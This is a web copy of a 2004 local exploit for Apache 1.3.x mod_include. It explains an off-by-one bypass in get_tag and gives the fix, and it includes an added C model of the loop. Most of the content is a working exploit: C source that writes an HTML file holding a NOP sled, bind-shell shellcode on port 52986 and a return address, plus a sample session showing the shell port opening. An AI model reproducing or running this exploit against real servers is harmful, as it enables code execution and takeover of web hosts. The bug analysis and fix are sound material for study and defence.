Apache mod_include_exp

王朝system · Author: anonymous · 2006-01-09

/*******************************************************************************
 * local exploit for mod_include of apache 1.3.x
 * written by xCrZx /18.10.2004/
 * bug found by xCrZx /18.10.2004/
 *
 * y0das old shao lin techniq ownz u :) remember my words
 * http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3
 *
 * Successfully tested on apache 1.3.31 under Linux RH9.0 (Shrike)
 ******************************************************************************/

/*******************************************************************************
 * Technical Details:
 *
 * There is an overflow in the get_tag function:
 *
 *   static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode)
 *   {
 *       ...
 *       term = c;
 *       while (1) {
 *           GET_CHAR(in, c, NULL, p);
 *   [1]     if (t - tag == tagbuf_len) {
 *               *t = '\0';
 *               return NULL;
 *           }
 *           // Want to accept \" as a valid character within a string. //
 *           if (c == '\\') {
 *   [2]         *(t++) = c;              // Add backslash //
 *               GET_CHAR(in, c, NULL, p);
 *               if (c == term) {         // Only if //
 *   [3]             *(--t) = c;          // Replace backslash ONLY for terminator //
 *               }
 *           }
 *           else if (c == term) {
 *               break;
 *           }
 *   [4]     *(t++) = c;
 *       }
 *       *t = '\0';
 *       ...
 *
 * As we can see, check [1] is meant to detect the end of the tag buffer, but it
 * is skipped when the stores at [2] and [4] both happen in the same iteration
 * without [3]: t advances two bytes between two checks, so it can step over the
 * point where t - tag == tagbuf_len, after which the check never fires again.
 *
 * So an attacker who can place a file that mod_include parses can overflow the
 * static buffer that tag points to and execute arbitrary code with the
 * privileges of the httpd child process.
 *
 * Fix:
 *   [1*]    if (t - tag >= tagbuf_len-1) {
 *
 * Notes: to activate mod_include you need "XBitHack on" in httpd.conf
 ******************************************************************************/
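To make the bypass concrete from the defender's side, here is an added C model of the get_tag loop above (written for this page, not the exploit's or Apache's code): it reads from a string instead of a FILE*, counts stores past the buffer instead of performing them, and runs the page's check [1] beside the corrected check [1*]. It assumes the caller reserves tagbuf_len + 1 bytes so a terminator at tag[tagbuf_len] is in bounds; the inputs are constructed for the demo.

```c
#include <stdio.h>
#include <string.h>

#define TAGBUF_LEN 8   /* usable bytes; the real buffer has TAGBUF_LEN + 1 for the NUL */
#define GUARD      16  /* spare bytes after the buffer so the demo itself stays in bounds */
/* Records the highest index stored to; the store is only performed inside the guard. */
void put(char *tag, int idx, char c, int limit, int *high) {
    if (idx > *high) *high = idx;
    if (idx < limit) tag[idx] = c;
}

/* Model of the quoted-value loop in get_tag: `in` is the text after the opening
 * quote, `term` the quote character, `tag` has tagbuf_len + 1 + GUARD bytes.
 * fixed == 0 uses the page's check [1], fixed == 1 the corrected check [1*].
 * Returns how many bytes were stored past tag[tagbuf_len] (0 means in bounds). */
int scan_quoted(const char *in, char term, char *tag, int tagbuf_len, int fixed) {
    int t = 0, high = -1, limit = tagbuf_len + 1 + GUARD;
    char c;
    while ((c = *in++) != '\0') {
        if (fixed ? (t >= tagbuf_len - 1) : (t == tagbuf_len))
            break;                              /* [1]/[1*]: value too long, give up */
        if (c == '\\') {                        /* [2]: backslash stored, no re-check */
            put(tag, t++, c, limit, &high);
            if ((c = *in++) == '\0') break;
            if (c == term) t--;                 /* [3]: \" collapses onto the backslash */
        } else if (c == term) {
            break;
        }
        put(tag, t++, c, limit, &high);         /* [4]: second store in one iteration */
    }
    put(tag, t, '\0', limit, &high);            /* terminator, as after the original loop */
    return high > tagbuf_len ? high - tagbuf_len : 0;
}

/* Runs one constructed input through the model and returns the overrun count. */
int overrun_for(const char *in, int fixed) {
    char tag[TAGBUF_LEN + 1 + GUARD];
    memset(tag, 'G', sizeof tag);
    return scan_quoted(in, '"', tag, TAGBUF_LEN, fixed);
}
int main(void) {
    /* Constructed inputs: short value; overlong plain value (check [1] catches it);
     * backslash two bytes before the limit (still caught); backslash exactly one
     * byte before the limit (check [1] is stepped over, every later byte overruns). */
    const char *in[] = { "abc\"", "AAAAAAAAAAAAAAAAAAAA\"", "AAAAA\\ABBBBBBBBBB\"",
                         "AAAAAAA\\ABBBBBB\"" };
    for (int i = 0; i < 4; i++)
        printf("%-22s original=%d fixed=%d\n", in[i], overrun_for(in[i], 0), overrun_for(in[i], 1));
    return 0;
}
```

With the original check only the last input overruns, and it does so by as many bytes as follow the escape; the corrected check returns 0 for all four.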

/*******************************************************************************
 * Example of work:
 *
 * [root@blacksand htdocs]# make 85mod_include
 * cc 85mod_include.c -o 85mod_include
 * [root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html
 * [root@blacksand htdocs]# chmod +x evil.html
 * [root@blacksand htdocs]# netstat -na|grep 52986
 * [root@blacksand htdocs]# telnet localhost 8080
 * Trying 127.0.0.1...
 * Connected to localhost.
 * Escape character is '^]'.
 * GET /evil.html HTTP/1.0
 * ^]
 * telnet> q
 * Connection closed.
 * [root@blacksand htdocs]# netstat -na|grep 52986
 * tcp 0 0 0.0.0.0:52986 0.0.0.0:* LISTEN
 * [root@blacksand htdocs]#
 ******************************************************************************/

/*******************************************************************************
 * Notes: ha1fsatan - you're a poop-person :))) be co0l as always
 ******************************************************************************/

/*******************************************************************************
 * Personal hello to my parents :)
 ******************************************************************************/

/*******************************************************************************
 * Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz
 ******************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memcpy, memset (missing in the original listing) */
#include <fcntl.h>

#define EVILBUF  8202
#define HTMLTEXT 1000
#define HTML_FORMAT "<html>\n<!--#echo done=\"%s\" -->\nxCrZx 0wn U\n</html>"
#define AUTHOR "\n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***\n"

int main(int argc, char **argv) {
    char html[EVILBUF+HTMLTEXT];
    /* one spare zeroed long so the buffer stays NUL-terminated after ret is appended */
    char evilbuf[EVILBUF+1+sizeof(long)];

    //can be changed
    char shellcode[] =
    // bind shell on 52986 port
    "\x31\xc0"
    "\x31\xdb\x53\x43\x53\x89\xd8\x40\x50\x89\xe1\xb0\x66\xcd\x80\x43"
    "\x66\xc7\x44\x24\x02\xce\xfa\xd1\x6c\x24\x04\x6a\x10\x51\x50\x89"
    "\xe1\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x43\x89\x61\x08\xb0"
    "\x66\xcd\x80\x93\x31\xc9\xb1\x03\x49\xb0\x3f\xcd\x80\x75\xf9\x68"
    "\x2f\x73\x68\x20\x68\x2f\x62\x69\x6e\x88\x4c\x24\x07\x89\xe3\x51"
    "\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

    //execve /tmp/sh <- your own program
    /*
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
    "\xc0\x88\x43\x07\x89\x5b\x08\x89"
    "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
    "\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
    "/tmp/sh";
    */

    char NOP[] = "\x90\x40";             // special nops ;)
    char evilpad[] = "\\CRZCRZCRZCRZC";  // trick ;)
    int padding, xpad = 0;
    int i, fd;
    long ret = 0xbfff8688;

    if (argc > 1) ret = strtoul(argv[1], 0, 16);
    else { fprintf(stderr, AUTHOR "\nUsage: %s <RET ADDR> > file.html\n\n", argv[0]); exit(0); }

    // bytes left for the NOP sled; it is built from 2-byte NOP pairs plus
    // at most one single byte (xpad) when the count is odd
    padding = (EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);
    while (1) {
        if (padding%2 == 0) { padding /= 2; break; }
        else { padding--; xpad++; }
    }

    memset(html, 0x0, sizeof html);
    memset(evilbuf, 0x0, sizeof evilbuf);

    for (i = 0; i < padding; i++)
        memcpy(evilbuf+strlen(evilbuf), &NOP, 2);
    for (i = 0; i < xpad; i++)
        memcpy(evilbuf+strlen(evilbuf), (evilbuf[strlen(evilbuf)-1]==NOP[1]) ? (&NOP[0]) : (&NOP[1]), 1);
    memcpy(evilbuf+strlen(evilbuf), &shellcode, sizeof shellcode);
    memcpy(evilbuf+strlen(evilbuf), &evilpad, sizeof evilpad);
    *(long*)&evilbuf[strlen(evilbuf)] = ret;

    sprintf(html, HTML_FORMAT, evilbuf);
    printf("%s", html);

    return 0;
}